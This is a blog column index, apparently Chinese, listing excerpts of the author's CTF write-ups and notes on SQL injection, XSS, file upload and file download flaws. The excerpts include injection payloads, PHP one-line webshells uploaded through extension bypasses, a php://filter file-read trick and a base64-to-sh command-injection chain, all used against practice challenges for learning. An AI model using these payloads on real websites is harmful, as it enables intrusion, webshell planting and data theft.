web
south_1
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
漏洞 复现
永恒之蓝(ms17_010)1.何为永恒之蓝?永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。2.什么是SMB协议?SMB(全称是Server Mes原创 2022-03-17 14:46:46 · 725 阅读 · 0 评论 -
ctfshow——web入门(sql注入)
web171爆库:1'union select 1,2,database()--+爆表:1'union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database()--+爆列名:1'union select 1,2,group_concat(column_name)from information_schema.columns where table_name='c原创 2021-08-11 14:26:20 · 340 阅读 · 0 评论 -
BUGKU——安慰奖
昨天刚写了一道绕过_wakeup()函数的题目今天又遇到一道,刚好拿来复习一下_wakeup()函数在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过_wakeup()函数的执行打开题目发现是个空白页面,查看一下源码,有个base64解码,解密出一个单词,意思是备份,然后尝试下载备份,这里有几种方式,因为不知道是哪种,就一 一尝试网站源码:www.zip.bak文件:xxx.bak(一般题目会提示文件名,不提示就尝试index.php.bak)vim缓存:xxx.swp意外退出为xxx原创 2021-06-08 10:47:11 · 365 阅读 · 0 评论 -
BUUCTF——[极客大挑战 2019]PHP
打开题目,页面上显示说习惯备份,尝试下载备份www.zip,下载后打开查看flag文件里并不是flag,查看其他的在class文件中发现代码,应该是让我们反序列化,给出源代码<?phpinclude 'flag.php';error_reporting(0);class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct(原创 2021-06-07 10:33:41 · 549 阅读 · 1 评论 -
BUUCTF——[极客大挑战 2019]HardSQL
打开题目,进行常规注入,发现都行不通,union、空格和and被过滤了,尝试extractvalue()报错注入可行,开始做题,建议做的时候可以先用burp抓包在里面做,在网页上做请先带好痛苦面具(有耐心的当我没说,嘿嘿)。先爆库名:payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(database()))))%23得到库名爆表名:payload:?username=1&password=12原创 2021-06-01 10:18:02 · 404 阅读 · 0 评论 -
CTFshow——web入门(信息泄露)
web1 源码泄露直接 f12 在下面注释行中可以看到flagweb2 前台js绕过方法有很多:1.ctrl+u 查看源代码2.burp抓包查看3.在网址前加上view-source:即可查看源代码web3 协议头信息泄露题目提示没思路抓包看看,就用burp抓个包看看,在响应头里发现flagweb4 robots后台泄露题目提示:总有人把后台地址写入robots,帮黑阔大佬们引路。访问robots.txt,得到flag地址/flagishere.txt,访问该地址拿到flagweb原创 2021-05-30 11:35:25 · 1941 阅读 · 3 评论 -
BUUCTF——[极客大挑战 2019]Http
打开题目是个网页,没有什么特别的,查看源代码发现Secret.php,利用burp抓包,提示我们该网页需要来自该网址修改referer头(没有自己添加上)进入到下一个环节,有提示我们说要使用这个浏览器,满足它就好了修改完之后又告诉我们要在本地阅读利用X-Forwarded-For:127.0.0.1就好了,拿到flag,每一步都有提示还是比较人性化的...原创 2021-05-29 10:26:57 · 160 阅读 · 0 评论 -
学习任意文件下载漏洞
什么是任意文件下载漏洞文件下载漏洞是指文件下载功能没有对下载的文件类型、目录做合理严谨的过滤,导致用户可以下载服务器的任意文件。任意文件下载漏洞的危害用户可以任意下载文件,例如脚本、代码服务器配置文件等。利用得到的代码进行审计分析有可能得到其它漏洞来进行攻击任意文件下载漏洞如何利用Google hacking上看inurl:"readfile.php?file="从链接上看:download.php?path=download.php?file=down.php?file=data.原创 2021-05-27 19:00:43 · 1318 阅读 · 0 评论 -
xss学习
学习小结- 一般做题思路就是闭合题目给出的函数来完成我们的弹窗- 反引号可以替换圆括号- <svg>标签中可以直接执行实体字符。<svg><script>alert(1)</script>- 换行可以绕过正则- 可以利用onclick,onmouseover等事件进行弹窗如:onclick=alert(1),onmouseover=alert(1)- 可以用换行来绕过“/ /”- <!-- -->和&原创 2021-05-27 10:26:31 · 424 阅读 · 0 评论 -
BUUCTF——[HCTF 2018]WarmUp
打开题目发现提示根据提示找到下一步,映入眼帘的是代码审计 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];//白名单 if (! is原创 2021-05-26 19:55:00 · 310 阅读 · 3 评论 -
第二届金盾信安杯部分wp
1.注意数字打开压缩包是个图片,分离得到一个加密压缩包,看似加密实则是伪加密,修正后得到1.txt,是一个多层base64,解密后得到但是这并不是flag,题目提示注意数字,图片上是李白的诗,有数字3和9,一开始以为是凯撒或者栅栏,试过之后无果,就去查还有哪些移位密码,找到仿射密码比较符合已知条件解密得到flag2.小火龙下载文件是个jpg图片放到winhex里查看,发现是png图片,拉到最底部,看到压缩包flag.txt,和pass手动分离得到压缩包,然后用密码打开得到flag3.我和十原创 2020-12-21 14:28:52 · 938 阅读 · 0 评论 -
日常练习之web([极客大挑战 2019]Secret File)
打开网页漆黑一片,显然是不想让我们看到什么,习惯性全选一下,发现第一道入口进去发现说把秘密都放在这里了,点开之后会跳到另一个网页,告诉我们已经看完了抓包看一下有没有什么关键信息跳转了,果然被我们发现 secr3t.php那我们就进去看看,是代码审计,但是告诉我们flag在flag.php中按照题目条件,让file=flag.php说看不到它,联想到php为协议,文件包含一下,构造payload?file=php://filter/read=convert.base64-encode/res原创 2020-12-15 10:19:15 · 193 阅读 · 0 评论 -
日常练习之web([ACTF2020 新生赛]Upload)
打开题目是一个灯泡,放上去会出现上传文件,但是只能上传jpg等图片类型的文件,很明显上传一个图片马<script language='php'>@eval($_POST['pass']);</script>放到txt里后缀名改成jpg格式,burp抓一下包,把jpg改成phtml绕过php检测这里可以看到上传成功拿出蚁剑或者菜刀连接你上传的木马在根目录下找到flagflag{1db8d2ff-bc9d-4d06-a4ef-94757f236712}...原创 2020-12-08 22:15:25 · 413 阅读 · 0 评论 -
日常练习之web(生日)
题目是某人的生日,给了一个登录框,用户只有admin,尝试用万能密码登录,行不通,于是就想到抓包爆破密码因为题目提示是生日所以就从1970-1999,生成一个生日字典进行爆破,得到密码。回到页面,登录拿到flagflag{01744832e0c01e4f77fa27382410af1e}!...原创 2020-12-08 21:21:11 · 508 阅读 · 0 评论 -
日常练习之web([RoarCTF 2019]Easy Calc)
题目要点:①var_dump()函数用于输出变量的相关信息;判断一个变量的类型与长度,并输出变量的数值,如果变量有值输的是变量的值并回返数据类型.此函数显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构②scandir()列出参数目录中的文件和目录③file_get_contents()把整个文件读入一个字符串中。④wafwaf不允许num传字母,我们可以加个空格它就无法识别“ num”和“num”,php在解析的时候,会先把空格给去掉,这样我们的原创 2020-12-08 20:03:50 · 175 阅读 · 0 评论 -
攻防世界(web)高手进阶
1.baby_web打开题目,题目描述提示想想初始页面,打开是1.php,改成index.php,开发者模式,选择在网络模块打开看到index.php,查找发现flagflag{very_baby_web}2.Training-WWW-Robots看到题目想到robots.txt,尝试一下果然,看到fl0g.php打开fl0g.php,拿到flagcyberpeace{27ec35e088ca35fa208f904330c15aad}3.warmup打开题目是个滑稽的表情,f12发现sou原创 2020-12-01 19:43:20 · 278 阅读 · 0 评论 -
日常练习之web(攻防世界favorite_number)
打开题目php代码映入眼帘,看到有提示版本,应该是版本漏洞是个判断数组强等于,又要首元素不等,然后正则要求整个字符串都是数字搜寻php5.5.9版本漏洞,有关php数组key溢出,看了大佬们的解释,有点明白,又有点不明白先放payloadstuff[4294967296]=admin&stuff[1]=user&num=123按照询问大佬的解释和网上查阅的资料,我的理解是计算机操作系统是32位的,那它最多的就是[2^31],这里的[4294967296=2 ^32 ]所以就会存在原创 2020-12-01 12:16:00 · 314 阅读 · 0 评论 -
日常练习之web(极客大挑战 2019 Upload)
看题目是一件文件上传题,让上传头像,那就传个一句话木马常用的木马网上也有,这里给出一个这道题用的一个GIF89a? <script language="php">eval($_REQUEST[pass])</script>一般绕过后缀名检测有php,php3,php5,pht,phtml等几种类型,这里采用phtml上传成功,拿出蚁剑连接一下http://xxx(题目的链接)/upload/22.phtml成功后选择在虚拟终端打开,cat flag拿到flag{4原创 2020-11-30 20:26:06 · 162 阅读 · 1 评论 -
日常练习之web(极客大挑战 2019 BuyFlag)
打开题目没看懂,让干嘛的,在右上角发现pyflag字样点进去看看,也没啥有用的信息,f12看一下源码发现提示需要post传入password和money,要让password=404 ,发现函数is_numeric,去学习一下说白了就是一个判断变量的函数,空格,%00,%20,这类的都可以绕过,后来我自己试验了一下发现这道题404后面跟一个字符(a,b,!,*等等可以自己试一下)也可以绕过,先传参抓包。出现一个user=0,给他改成user=1。如果你money不够多就会出现loser太惨了原创 2020-11-30 17:40:18 · 205 阅读 · 0 评论 -
每日一题web--想你而来的flag
?id=-1//uNiOn//sEleCt//1,2,group_concat(flag)Frfromom//flag原创 2020-11-29 15:58:04 · 331 阅读 · 0 评论 -
日常练习之web(BackupFile)
打开题目只有一句话查看源码无果抓包无果卡了很久,无奈只好去寻wp,找到index.php.bak备份文件,代码审计发现是php弱比较要让 key=str这里只需要key=123即可得到flagflag{4538b12f-1733-4c4c-99d7-e6ba9dbc0daf}...原创 2020-11-29 13:56:24 · 295 阅读 · 0 评论 -
日常练习之web(新生赛 Include)
打开题目点击链接,会跳转到这个页面抓包看看也没什么东西,求助大佬,大佬说是PHP为协议,上经典payload?file=php://filter/read=convert.base64-encode/resource=flag.php得到一串base64拿去解密得到flagphp://filter 伪协议该伪协议就是将原本看不到的php源代码进行base64编码再输出...原创 2020-11-27 19:57:35 · 128 阅读 · 0 评论 -
日常练习之web(Ping Ping Ping)
打开题目是/?ip=猜测应该是命令执行,先试一下?ip=127.0.0.1;cat flag发现过滤了空格,尝试?ip=127.0.0.1;ls发现flag.php,绕过空格/?ip=127.0.0.1;cat$IFS$9flag.phpflag被过滤了,换一种方法先看看index.php/?ip=127.0.0.1;cat$IFS$9index.php发现bash也没了,不过可以用sh来执行echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|shY2F0原创 2020-11-26 12:28:56 · 1175 阅读 · 0 评论 -
每日一题web——Pig Shop
打开题目有两个输入框,猜测可能是注入,输入字符多了还会出现错误提示只允许有一个字符,看到群里说要买第四个,就试了一下,随便输一个数字,钱不够会出现提示想要钱??给你一个 亿中文字符也可以,我是没想到的,纯属瞎蒙。后面看到大佬们说跟函数unicodedata.numeric()有关,就去网上搜了一下 相关资料说了那么多,就是这个函数会把数字和代表数字的字符转换并返回,没有的会返回错误。所以这样,这一题也不难理解了。也就是说你输入比1337大的数就可以得到flag。比如:万,亿等。或者去网上原创 2020-11-25 21:08:31 · 277 阅读 · 2 评论 -
日常练习之web(Easy MD5)
打开题目是这样一个界面,猜测可能是注入问题,试了很久无果查看源码无意间看到hint是注入,但是不会,去看大佬wp,发现输入ffifdyop可以绕过,原因是ffifdyop会被解析为16进制276f722736c95d99e921722cf9ed621c,16进制又会被转为ascii,刚好是’or’6,与原句拼接刚好成为一个永真,达到绕过的效果(这里我搜了很多wp都没有很具体解释ffifdyop怎么来的,总之记下就好ffifdyop代表’or’6 以后碰到类似的题可以直接用),绕过之后出现另一个页面原创 2020-11-25 20:42:30 · 248 阅读 · 1 评论
分享